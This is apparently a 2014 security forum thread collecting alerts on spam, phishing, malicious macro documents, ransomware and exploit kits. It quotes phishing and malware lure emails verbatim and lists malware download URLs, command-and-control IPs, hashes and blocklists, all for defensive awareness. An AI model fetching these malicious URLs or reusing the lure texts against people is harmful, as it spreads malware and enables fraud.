11 Nov 2014 - "'Duplicate Payment Received' pretending to come from various random names with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Good afternoon,
I refer to the above invoice for which we received a bacs payment of £660.94 on 10th November 14. Please be advised that we already received payment for this invoice, by bacs on 30th October 2014.
I will therefore arrange a refund, please confirm preferred method, cheque or bacs transfer. If a cheque please confirm the name the cheque should be made out too or if bank transfer, please advise bank details.
If you have any queries regarding this matter, please do not hesitate to contact me.
I look forward to hearing from you .
Many thanks
Lenora Dunn
Accounts Department

11 November 2014 : De_VY955279R.doc - Current Virus total detections: 2/55*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e2a53e440bf4b5528d3ddd751b23410f91fa1fd27ef830b3493497c63b89a9bd/analysis/1415704035/

- http://blog.dynamoo.com/2014/11/duplicate-payment-received-spam-has.html
11 Nov 2014
... Recommended blocklist:
178.254.57.146
213.140.115.29
62.76.180.133
62.76.189.108 "
___

Trojan SMS Found on Google Play
- https://blog.malwarebytes.org/mobile-2/2014/11/trojan-sms-found-on-google-play/
Nov 11, 2014 - "... this one slipped under Google Play’s radar, but an SMS Trojan app with the package name com.FREE_APPS_435.android claims to be a download for wallpapers, videos, and music is actively on the Google Play store (at least at the time of this writing it was).
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/ScreenShot1.jpg
... This tactic has been seen since malware started appearing on Android devices. If you visit the developer’s website from the link provided on the Google Play page, it takes you to a page with two banners and a couple of links.
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/ScreenShot3.jpg
... Google Play has been notified of the existence of this SMS Trojan. The last update of this app was August 20th 2013, which was most likely the date it was added to the Play store. Many variants of this Trojan have been seen that are not currently on the Play store. We flag this Trojan and similar variants as Android/Trojan.SMS.Agent. This is proof that Google Play isn’t perfect at alleviating all malware."
___

Predator Pain and Limitless... the Fraud
- http://blog.trendmicro.com/trendlabs-security-intelligence/predator-pain-and-limitless-behind-the-fraud/
Nov 11, 2014 - "ZeuS/ZBOT has been one of the most talked about malware families for several years, and with good reason... It is estimated that ZBOT has enabled cybercriminals to steal more than $100 million US dollars since its inception... the Commercial Crime Bureau of Hong Kong Police Force estimates this kind of fraud has netted attackers up to $75 million US dollars in the first half of this year, from Hong Kong alone... cybercriminals in a single city, within six-months, equaled all the losses from ZBOT up to the present. Unlike Zeus, Predator Pain and Limitless are relatively simple keyloggers. They indiscriminately steal web credentials and mail client credentials, as well as capturing keystrokes and screen captures. The output is human readable... clever targeting, patience, cunning and simple keyloggers have netted these cybercriminals large sums of money. These highlight that cybercrime activities are dependent not only on the sophistication of the tools used, but on how well organized the entire scheme is... The following graphs show the distribution of the victims that we observed, both by country and by industry:
Predator Pain/Limitless Victims by Country:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/Country-Distribution-01.jpg
Predator Pain/Limitless Victims by Industry:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/Industry-Distribution-01.jpg

- http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cybercrime-to-cyberspying-limitless-keylogger-and-predator-pain/
"... The cybercriminals instead went after SMBs (small and medium-sized businesses), which led us to realize how vulnerable they are to the threat..."

:mad: :fear:

AplusWebMaster
2014-11-12, 16:01
FYI...

Fake 'Police' SPAM ...
- http://blog.dynamoo.com/2014/11/exchange-house-fraud-police-headquaters.html
12 Nov 2014 - "I got a lot of these yesterday..

From: omaniex@ investigtion .com
Subject: Exchange House Fraud (Police Headquaters)
please note that your attension is needed in our station, as we got information on this fraud information as transactions detailed in attachment. kindly acknowledge this letter and report to our office as all report and contact details are in attachment. failure to this you will be held responsible.
Note: come along with your report as it will be needed
regards,
Police headquarters.
Investigtion dept.

Attached is a file EXCH DETAILS PR 7777709.zip which contains two files:
7 TRANSACTION RPPP 00000123-PDF.jar
PR0JECT INVESTIGATI 011111-PDF.jar
... malicious application written in Java (top tip - if you have Java installed on your computer, remove it. You probably -don't- need it). It has a VirusTotal detection rate of 7/55*..."
* https://www.virustotal.com/en/file/bd15776998194aa3a1be49a9eeb982fcb69cf57c76cd7319e1553b929b4f6349/analysis/1415792881/
___

ADP Past Due Invoice Spam
- http://threattrack.tumblr.com/post/102455898273/adp-past-due-invoice-spam
Nov 12, 2014 - "Subjects Seen:
ADP Past Due Invoice#54495150
Typical e-mail details:
Your ADP past due invoice is ready for your review at ADP Online Invoice Management .
If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the invoice.
Review your ADP past due invoice here.
Important: Please do not respond to this message. It comes from an unattended mailbox.

Malicious URLs:
kurdogluhotels .com/docfiles/invoice_1211.php
kevalee .ac.th/docfiles/invoice_1211.php
Malicious File Name and MD5:
invoice1211_pdf27.zip (05FC7646CF11B6E7FB124782DAF9FB53)
invoice1211_pdf.exe (78CF05FAA79B41B4BE4666E3496D1D54)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4eb2bf63ec6433cda6fde59dcbf32fc9/tumblr_inline_nexql2Bx451r6pupn.png

Tagged: ADP, Upatre

- http://blog.dynamoo.com/2014/11/adp-past-due-invoice39911564-spam.html
12 Nov 2014
... Recommended blocklist:
188.165.206.208
shahlart .com
mboaqpweuhs .com "

- http://www.threattracksecurity.com/it-blog/adp-past-due-invoice-spam/
Nov 13, 2014 - "... the Upatre Trojan, which in turn downloaded and decrypted the banking-credential-stealing Trojan Dyre..."
Screenshot: http://www.threattracksecurity.com/it-blog/wp-content/uploads/2014/11/ADP-Past-Due-Invoice.png

94.23.49.77: https://www.virustotal.com/en/ip-address/94.23.49.77/information/

:mad: :fear:

AplusWebMaster
2014-11-13, 17:52
FYI...

Fake 'BankLine' SPAM - targets RBS customers
- http://blog.mxlab.eu/2014/11/13/fake-email-regarding-new-secure-message-from-bankline-that-targets-rbs-customers/
Nov 13, 2014 - "... intercepted -fake- emails regarding a new secure message from BankLine that targets RBS customers. The subject line is “You have received a new secure message from BankLine#24802254″ this email is sent from the spoofed address “Bankline <secure.message @ bankline .com>” and has the following body:
You have received a secure message.
Read your secure message by following the link bellow:
link-
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk at 0131 556 1196.
First time users – will need to register after opening the attachment...

The embedded URL in our sample leads to hxxp ://vsrwhitefish .com/bankline/message.php. This will open up and HTML document with an integrated Javascript script that will make use of ActiveXObject or a regular HTTP request, opens up a download in order to open and/or save the malicious file as instructed."

216.251.43.98: https://www.virustotal.com/en/ip-address/216.251.43.98/information/
... 5/60 2014-11-13 13:23:41 http ://vsrwhitefish .com/bankline/message.php
___

Fake 'Voice mail' SPAM ...
- http://blog.mxlab.eu/2014/11/13/voice-message-emails-contains-security-threat/
Nov 13, 2014 - "... intercepted a large campaign by email with the subject “Voice Message #0768384921 (numbers may vary)” and is continuation of the previous campaign targeting RBS customers. This email is sent from the spoofed address “Message Admin <martin.smith@ essex .org.uk>” and has the following body:

Voice redirected message
hxxp ://crcmich .org/bankline/message.php
Sent: Thu, 13 Nov 2014 11:54:24 +0000

The embedded URL in our sample leads to hxxp ://crcmich .org/bankline/message.php. This will open up and HTML document with an integrated Javascript script that will make use of ActiveXObject or a regular HTTP request, opens up a download in order to open and/or save the malicious file as instructed."

69.160.53.51: https://www.virustotal.com/en/ip-address/69.160.53.51/information/
... 3/61 2014-11-13 15:04:47 http ://crcmich .org/bankline/message.php?
___

Alert (TA14-317A)
Apple iOS "Masque Attack" Technique
- https://www.us-cert.gov/ncas/alerts/TA14-317A
Nov 13, 2014
Systems Affected:
iOS devices running iOS 7.1.1, 7.1.2, 8.0, 8.1, and 8.1.1 beta.
Overview:
A technique labeled “Masque Attack” allows an attacker to substitute malware for a legitimate iOS app under a limited set of circumstances...
(More detail at the URL above.)

:mad: :fear:

AplusWebMaster
2014-11-14, 16:35
FYI...

Fake 'Amazon frozen account' – Phish ...
- http://myonlinesecurity.co.uk/amazon-account-frozen-temporarily-phishing/
14 Nov 2014 - "'Your account has been frozen temporarily' pretending to come from Amazon <auto-confirm@ amazon .co.uk> is one of the latest -phish- attempts to steal your Amazon Account and your Bank, credit card and personal details. This one only wants your personal details, Amazon log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/amazon_phishing-email.png
If you open the -attached- html file you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/amazon_login.png
When you fill in your user name and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format. After submitting the information you get -bounced- on to the genuine Amazon .co.uk website:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/amazon_account_verification.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___

CoinVault - new ransomware
- http://www.webroot.com/blog/2014/11/14/coinvault/
Nov 14, 2014 - "Today we encountered a new type of encrypting ransomware that looks to be of the cryptographic locker family. It employs the same method of encryption and has a very similar GUI (kills VSS, increases required payment every 24hr, uses bitcoin payment, etc.).
CoinVault GUI:
> https://i.imgur.com/ADEO21U.png
Here is the background* that it creates – also very similar.
* https://i.imgur.com/LAHkjT8.png
... this is the first Encrypting Ransomware that I’ve seen which actually gives you a free decrypt. It will let you pick any single file that you need after encryption and will decrypt it for you.
> http://i.imgur.com/F3enAqN.png
... it gives a good insight into what the actual decryption routine is like if you find yourself actually having to pay them. I suspect that this freebie will increase the number of people who will pay..."

- http://arstechnica.com/security/2014/11/new-cryptoware-title-borrows-page-from-drug-dealers/
Nov 14 2014
___

Flash Player updated ...
- https://blog.malwarebytes.org/online-security/2014/11/18-vulnerabilities-fixed-update-your-flash-player/
Nov 14, 2014 - "Adobe has fixed -18- vulnerabilities in their Flash Player, and you should update immediately, if you haven’t already done so. However, please ensure you’re installing / updating from the right place. For example:
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/adobupd1.jpg
The above site claims:
It is recommended that you update Flash to the latest version to view this page. Please update to continue. Your Flash Plugin version is too low, causing the current sites and related softwares can not be opened properly, please update your Flash Plugin now!
The site -forwards- visitors to a sign-up page offering a “Mac cleaning” tool... confusing for anybody expecting Adobe Flash updates.
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/adobupd2.jpg
The Adobe Flash Player website is the place to go for Flash installs*... Always cast a critical eye at the URL of any “Flash Player” site you happen to be on, and check the small print in case you end up with more than you bargained for. Fake Flash Player websites have been around for many years, and are often a prime source of unwanted PUP installs and the occasional slice of Malware..."
* http://get.adobe.com/flashplayer/ ... (Uncheck the 'McAfee' option if you choose not to use it...)

:fear::fear: :mad:

AplusWebMaster
2014-11-17, 15:07
FYI...

Fake Fax SPAM - malicious .DOCM attachment
- http://blog.dynamoo.com/2014/11/interfax-failed-fax-transmission-spam.html
17 Nov 2014 - "This -fake- fax spam comes with a malicious attachment
From: Interfax [uk@ interfax .net]
Date: 13 November 2014 20:29
Subject: Failed Fax Transmission to 01616133969@fax.tc<00441616133969>
Transmission Results
Destination Fax: 00441616133969
Contact Name: 01616133969@ fax .tc
Start Time: 2014/11/13 20:05:27
End Time: 2014/11/13 20:29:00
Transmission Result: 3220 - Communication error
Pages sent: 0
Subject: 140186561.XLS
CSID:
Duration (In Seconds): 103
Message ID: 485646629
Thank you for using Interfax ...

Attached is a malicious Word macro file called 00000293.docm which is currently undetected at VirusTotal*... Inside this .DOCM file is a malicious macro... which attempts to download a malicious binary from http ://agro2000 .cba .pl/js/bin.exe . This file is downloaded to %TEMP%\MRSWZZFEYPX.exe and the binary also has zero detections at VirusTotal**, and the Malwr report shows that it tries to connect to the following URL: http ://84.40.9.34 /lneinn/mo%26af.lipgs%2Bfn%7El%3Fboel%3D%3F+%3Fa%20%3F~pigc_k/ci$slf%2B%20l%3D%7E . It then drops a malicious DLL onto the target system which has a rather better detection rate of 12/53***. If you are a corporate email admistrator they you might consider blocking .DOCM files at the perimeter as I can see no valid reason these to be sent by email. You should definitely block 84.40.9.34 (Hostway, Belgium) as this is a known bad server that has been used in several recent attacks."
* https://www.virustotal.com/en/file/724b6ed9f68ae9e217f1b88a8107f7b3cb95cf8a55ce2fbf0a7c455099f66012/analysis/1416221806/

** https://www.virustotal.com/en/file/8307c13583837bcfc30e8c267133f33e3fff4d86abd59adcb7f1fb7dd04a0d54/analysis/1416222127/

*** https://www.virustotal.com/en/file/1a774212d3f20523c4ddd63dd657954eeb7bf97c19ce9a9838b5297239c0119b/analysis/1416222797/

84.40.9.34: https://www.virustotal.com/en/ip-address/84.40.9.34/information/

- http://myonlinesecurity.co.uk/failed-fax-transmission-01616133969fax-tc-word-doc-malware/
17 Nov 2014
> https://www.virustotal.com/en/file/724b6ed9f68ae9e217f1b88a8107f7b3cb95cf8a55ce2fbf0a7c455099f66012/analysis/1416212735/
___

Fake Investment SPAM ...
- http://myonlinesecurity.co.uk/investment-opportunities-ireland-malware/
17 Nov 2014 - "'Investment Opportunities in Ireland' pretending to come from IDA Ireland (Home of Foreign Businesses) <info@idaireland.com> with a link to a malicious zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/Investment-Opportunities-in-Ireland.png

Todays Date: investmentareas.rar: Extracts to: investmentareas.scr
Current Virus total detections: 26/55* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/b05b065ab2fbb6db6c29fd0a6ad856bca0fafe46322d91890dc1755788ea6e7b/analysis/1416215003/
___

Fake 'Payment Declined' Phish ...
- http://myonlinesecurity.co.uk/bt-account-payment-declined-phishing/
17 Nov 2014 - "Any phishing attempt wants to get as much personal and financial information from you as possible. This 'BT Account- Payment Declined' pretending to come from BT .com <noreplymail@ btc .com> phishing scam is one of them. The phishers try to use well known companies or Government departments like British Telecom, HMRC, Inland Revenue, Virgin Media, British Gas or any company that many people are likely to have an account with. This one wants your personal details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/BT-Account-Payment-Declined.png

The link in the email leads you to a webpage looking like:
Screenshot2: http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/BT-billing-fake-log-in.png

That leads on to a page to enter all your details, including bank account, credit card, mother’s maiden name and everything else necessary to steal your identity and clean out your bank and credit card accounts:
Screenshot3: http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/BT-billing-fake-details.png

Then you get a success page, where they kindly inform you that “The Anti Fraud System has been succesfully added to your account” and then are bounced to the real BT site:
Screenshot4: http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/BT-billing-fake-details-success-.png

All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."
___

Fake 'Test message' SPAM plague continues..
- http://blog.dynamoo.com/2014/11/test-message-spam-plague-continues.html
17 Nov 2014 - "This plague of spam "test messages" have been going on for two days now, probably sourced from "Botnet 125"* which sends most of the spam I get. These messages are annoying but no harmful in themselves, I suspect they are probing mail servers for responses. If you have a catch-all email address then you will probably see a lot of these. The targets are either completely random or have been harvested from one data breach or another as far as I can see.
From: Hollie <Laurie.17@ 123goa .com>
Date: 17 November 2014 19:04
Subject: Test 8657443T
test message.
Murphy became a free agent on October 15, after refusing a minor league assignment. Silva implies the last cycle has begun, believing herself to be the host.
Icelandic had been heard. American CIA contract air crews and pilots from the Alabama Air Guard... ..."
* http://www.proofpoint.com/threatinsight/posts/dueling-dridex-campaigns-target-banking-customers.php

:mad: :fear:

AplusWebMaster
2014-11-18, 13:16
FYI...

Fake Invoice SPAM - Word doc malware attached
- http://myonlinesecurity.co.uk/email-contains-invoice-file-attachment-invoice-1633370-may-word-doc-malware/
18 May 2014 - "'Invoice #1633370 May' with a malicious word doc attachment saying 'This email contains an invoice file attachment' is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

This email contains an invoice file attachment

So far today, I have seen 3 different size files attached to this email, All file names are random:
18 November 2014 : invoice_796732903.doc (59kb) Current Virus total detections: 1/55*

18 November 2014 : invoice_1952581.doc (41kb) Current Virus total detections: 1/55**

18 November 2014 : invoice_80943810.doc (22kb) Current Virus total detections: 0/54***
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0a78296121f16e13812c609c2d55245a492b6a992c99b403b2427e41acae9e72/analysis/1416303264/

** https://www.virustotal.com/en/file/70411393ea66130204abfb3653646dcb495538fbbc6a5a76bef1376625d2fcbf/analysis/1416304606/

*** https://www.virustotal.com/en/file/670011a08ddcde9d1892593a968f87e9e8800248f6bb9b8967b05ec4c34b64d0/analysis/1416304325/
___

Another Fake FAX SPAM run ...
- http://blog.dynamoo.com/2014/11/incoming-fax-report-spam-lets-party.html
18 Nov 2014 - "... 'need to load some more papyrus into the facsimile machine...:
From: Incoming Fax [no-reply@ efax .co.uk]
Date: 18 November 2014 13:16
Subject: INCOMING FAX REPORT : Remote ID: 766-868-5553
INCOMING FAX REPORT
Date/Time: Tue, 18 Nov 2014 14:16:58 +0100
Speed: 4222bps
Connection time: 01:09
Pages: 5
Resolution: Normal
Remote ID: 963-864-5728
Line number: 1
DTMF/DID:
Description: Internal report
We have uploaded fax report on dropbox, please use the following link to download your file...

This is (of course) utter bollocks, and the link in the email downloads a ZIP file document_8731_pdf.zip which in turn contains a malicious executable document_8731_pdf.exe which has a VirusTotal detection rate of 4/54*. According to the Malwr report it makes these following HTTP requests:
http ://108.61.229.224:13861 /1811us1/HOME/0/51-SP3/0/
http ://108.61.229.224:13861 /1811us1/HOME/1/0/0/
http ://159593.webhosting58 .1blu. de/mandoc/narutus1.pmg
It also drops a file EXE1.EXE onto the target system which has a detection rate of 7/55**...
Recommended blocklist:
108.61.229.224
159593.webhosting58 .1blu .de "
* https://www.virustotal.com/en/file/d567e8853aa3cbccbd5082471f761f75d77daf68c8d448e88875f141d6d0ab6f/analysis/1416318405/
... Behavioural information
TCP connections
108.61.229.224: https://www.virustotal.com/en/ip-address/108.61.229.224/information/
178.254.0.111: https://www.virustotal.com/en/ip-address/178.254.0.111/information/

** https://www.virustotal.com/en/file/5ec1e1850100849dd4750ef083824806304e82be5233e241b69b1960acc96324/analysis/1416318784/

- http://myonlinesecurity.co.uk/incoming-fax-report-remote-id-999-745-5477-fake-pdf-malware/
18 Nov 2014
- https://www.virustotal.com/en/file/d567e8853aa3cbccbd5082471f761f75d77daf68c8d448e88875f141d6d0ab6f/analysis/1416321619/
___

Fake Voice msg SPAM again - PDF malware
- http://myonlinesecurity.co.uk/voice-message-685-869-9737-mailbox-226-fake-pdf-malware/
18 Nov 2014 - "'voice message from 685-869-9737 for mailbox 226' pretending to come from 'Voice Mail <voicemail_sender@ voicemail .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:
You have received a voice mail message from 685-869-9737
Message length is 00:00:30. Message size is 225 KB.
Download your voicemail message from dropbox service below (Google Disk Drive Inc.)...

18 November 2014: document_8731_pdf.zip (12 kb): Extracts to: document_8731_pdf.exe
Current Virus total detections: 4/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d567e8853aa3cbccbd5082471f761f75d77daf68c8d448e88875f141d6d0ab6f/analysis/1416321619/

:fear: :mad:

AplusWebMaster
2014-11-19, 16:24
FYI...

Fake Bank phish ...
- http://myonlinesecurity.co.uk/lloyds-bank-improving-current-account-phishing/
19 Nov 2014 - "There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card, with a message saying some thing like :
-We’re improving your current account
-There have been unauthorised or suspicious attempts to log in to your account, please verify
-Your account has exceeded its limit and needs to be verified
-Your account will be suspended !
-You have received a secure message from < your bank>
-New Secure Message
-We are unable to verify your account information
-Update Personal Information
-Urgent Account Review Notification
-We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address
-Confirmation of Order

This one is Lloyds bank 'We’re improving your current account' pretending to come from Lloyds Banking Group Plc <info@ emails.very .co.uk> The original email looks like this. It will NEVER be a genuine email from PayPal or Your Bank so don’t ever fill in the html (webpage) form that comes attached to the email. Some versions of this phish will have a link to a website that looks at first glance like the genuine bank website. Lloyds actually -do- allow you to pay in and perform some transactions at a Post Office rather than going to your branch, so many users might get unwittingly caught out by this one and think they need to notify the bank.
Email looks like:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/lloyds-We-are-improving-your-current-account.png

This one wants your personal details and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details... whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details. If it says .EXE then it is a problem and should -not- be run or opened."
___

Azure cloud outages - MSN web portal offline
- http://www.reuters.com/article/2014/11/19/us-microsoft-web-idUSKCN0J309E20141119
Nov 18, 2014 11:53pm EST - "Microsoft Corp's Azure cloud-computing service, which hosts websites and lets customers store and manage data remotely, suffered serious outages on Tuesday taking its popular MSN web portal offline. According to Microsoft's Azure status page*, the problems started around 5pm Pacific time and have still not been fully solved..."
* http://azure.microsoft.com/en-us/status/#history

>> http://azure.microsoft.com/blog/2014/11/19/update-on-azure-storage-service-interruption/
Nov 19, 2014

:fear::fear: :mad:

AplusWebMaster
2014-11-20, 18:01
FYI...

Angler Exploit Kit adds New Flash Exploit...
- http://threatpost.com/angler-exploit-kit-adds-new-flash-exploit-for-cve-2014-8440/109498
Nov 20, 2014 - "... Angler is just one of the many such exploit kits available to attackers, but the creators of this one seem to be especially quick about adding exploits for new vulnerabilities to the kit. In October, a week after Adobe released its monthly patch update, researchers saw Angler exploiting an integer overflow in Flash that had just been patched. “This is really, really fast,” Kafeine, a French security researcher who identified the attack at the time, said. “The best I remember was maybe three weeks in February 2014.” Now, Kafeine said he already has seen Angler exploiting a Flash vulnerability that was patched Nov. 11 in Adobe’s November update release*. This vulnerability is CVE-2014-8440, a memory corruption flaw in Flash that can allow an attacker to take control of a target system. The bug exists in Flash on multiple platforms, including Windows, OS X and Linux, and Kafeine said it is getting its share of attention from attackers. “The vulnerability is being exploited in blind mass attack. No doubt about it: the team behind Angler is really good at what it does,” he said in a blog post*..."
* http://malware.dontneedcoffee.com/2014/11/cve-2014-8440.html

> https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8440 - 10.0 (HIGH)
Last revised: 11/12/2014

Flash test site: https://www.adobe.com/software/flash/about/
___

Fake Donation Overpayment SCAM
- https://www.ic3.gov/media/2014/141120.aspx
Nov 20, 2014 - "... received numerous complaints from businesses, charitable organizations, schools, universities, health related organizations, and non-profit organizations, reporting an online donation scheme. The complaints reported subjects who had donated thousands of dollars, via stolen credit cards. Once donations were made, the subjects immediately requested the majority of the donation back, but credited to a different card. They claimed to have mistakenly donated too much by adding an extra digit to the dollar amount (i.e., $5000 was ‘accidently’ entered instead of $500). However, very few complainants actually returned the money to the second credit card. Many, through their own investigations, discovered the original card was -stolen- or the credit card company notified them of such. Also, some of the organizations’ policies did not allow funds to be returned to a different credit card."

:fear::fear: :mad:

AplusWebMaster
2014-11-21, 19:59
:mad:FYI...

Something evil on 46.8.14.154
- http://blog.dynamoo.com/2014/11/something-evil-on-46814154.html
21 Nov 2014 - "46.8.14.154 (Netart Group S.r.o. / Movenix International Inc) forms part of an exploit chain that starts with compromised OpenX servers and appears to end up with an exploit kit of some sort... subdomains have been active on that server, they are ALL hijacked GoDaddy domains... (Long list @ the dynamoo URL above) ... The best thing to do is to -block- traffic to 46.8.14.154 because these domains seem to change every few minutes."
___

Fake 'Payment Received' SPAM - malicious DOC attachment
- http://blog.dynamoo.com/2014/11/duplicate-payment-received-spam-from.html
21 Nov 2014 - "This -fake- financial spam has a malicious Word document attached.
From: Enid Tyson
Date: 21 November 2014 15:36
Subject: INV209473A Duplicate Payment Received
Good afternoon,
I refer to the above invoice for which we received a bacs payment of £675.74 on 10th November 14. Please be advised that we already received payment for this invoice, by bacs on 30th October 2014.
I will therefore arrange a refund, please confirm preferred method, cheque or bacs transfer. If a cheque please confirm the name the cheque should be made out too or if bank transfer, please advise bank details.
If you have any queries regarding this matter, please do not hesitate to contact me.
I look forward to hearing from you .
Many thanks
Enid Tyson
Accounts Department

In this case the attachment is De_209473A.doc but it will probably vary with the subject name, the document itself has zero detections at VirusTotal (the Malwr report is inconclusive).This contains a malicious macro.. which connects to the following URL:
http ://79.137.227.123 :8080/get1/get1.php
...This has a VirusTotal detection rate of just 1/55*. The malware is hardened against analysis in a Sandbox so automated results are inconclusive...
UPDATE: A second version is going the rounds, with zero detections** and a download location of http :// 61.221.117.205 :8080/get1/get1.php ..."
* https://www.virustotal.com/en/file/7beee0920340d5a610f458ce1ebc0575e7854e88e2cbe1bebd8ec6014b778fe5/analysis/1416584784/

* https://www.virustotal.com/en/file/ea85382435cf26e8066780b7115e4beef78caa0e8766bff324ff19e216496e4b/analysis/1416584533/

:fear: :mad:

AplusWebMaster
2014-11-23, 00:05
FYI...

Fake 'Herbal Root' email SCAM
- http://blog.dynamoo.com/2014/11/oplamo-herbal-root-scam.html
22 Nov 2014 - "... there is no such thing as "Oplamo Herbal Root". So, this spam is almost definitely a scam.
From: Mr. Tom Good Hope [mrtomgood@ gmail .com]
Reply-To: mrtomgoodhope@ gmail .com
Date: 22 November 2014 02:24
Subject: SUPPLY BUSINESS OF OPLAMO
My name is Tom Goodhope i based in Liverpool,UK working with a pharmaceutical company.
I have decided to contact you directly to discuss briefly via email about the ongoing supply that came up in our company. I think if you can understand English and India Language (Hindi,Tamil etc) you can take up this business proposal to buy out OPLAMO HERBAL ROOT from the local producer in India and make supply to our company as the direct producer to enable our company be buying direct from you on every subsequent order after this first purchase. OPLAMO ROOT its used for production of Anti-viral drugs & Animal Vaccines.Our company have been purchasing the materials from Pakistan but it is very scarce and expensive now in Pakistan. I've found out the truth that this Pakistan people purchases this product in India at the rate of $210 USD, while they supply to our company at the rate of $430 USD... Upon your reply i will clarify you more on how to start this business immediately, please drop your contact phone number for me to be able to contact you ASAP.
Thanks,
Mr Tom Goodhope
Company Secretary ...

... the originating IP address is actually 123.239.58.103 in Delhi, sent via 198.20.245.154 [eas.easylhost .com] in the US... give it a very wide berth.
___

Fake 'my new photo' SPAM - malware - Google’s webp images
- http://myonlinesecurity.co.uk/new-photo-malware-googles-webp-images/
22 Nov 2014 - "... a persistent attack by email for some time now. The subject is always “my new photo” or the equivalent in Spanish. Until 2 days ago the -zip- attached to the email just contained a single malware file which is generally identified as Androm or Gamarue or Wauchos depending on which antivirus you have installed. It obviously takes a few hours or even a day or more for the antivirus companies to catch up with new versions so some users get infected. Over the last few days there has been a change in delivery methods. Along with the “normal” executable file there is what appears to be a standard jpg that won’t display natively in window explorer or in the majority of imaging/photo editing/viewing programs. It will display in Chrome browser. Looking at the file headers, the image is a genuine image but is the “new” webp format from google https ://developers.google .com/speed/webp/ which needs a codec from google to display in windows explorer or a plug in to display or use in common image editing/viewing programs. We will almost certainly see requests or comments in various forums or facebook or other tech help sites. It is believed that if a user “accidentally” or otherwise runs the exe file then the image is displayed in the browser (if chrome is default) or the google plugin or codec has been installed and the user thinks that it was just an image and not a malware file. Of course the .exe file has the extension hidden by default and the icon suggests it is a jpg image file which makes the unwary more likely to click on it and consequently become infected. I have been charting the progress of this malware for some time now, since it first appeared at end of August... we do see quite a few posts saying that the user cannot see the jpg image in an email or on a webpage in IE, FF etc but it -does- in chrome OR why they cannot view or edit a downloaded jpg. The zip file contains 2 files - 1 is a standard .exe with an icon that looks like a jpg that if you don’t have show hidden extensions shown can confuse a user and lead to infection when clicked on... If you open the image files in a hex editor or analysis program you will see the file type headers information:
for jpg they are ……JFIF…..`.`……Exif..MM
for PNG they are .PNG……..IHDR……………g…..sRGB………gAMA……a…..pHYs……….
For Webp they are RIFFhs..WEBPVP8 "
(Comparison example images shown at the URL at the top.)

:fear: :spider: :mad:

AplusWebMaster
2014-11-24, 19:00
FYI...

RFID Payment Cards Hack possible with Android App
- http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-rfid-payment-cards-made-possible-with-android-app/
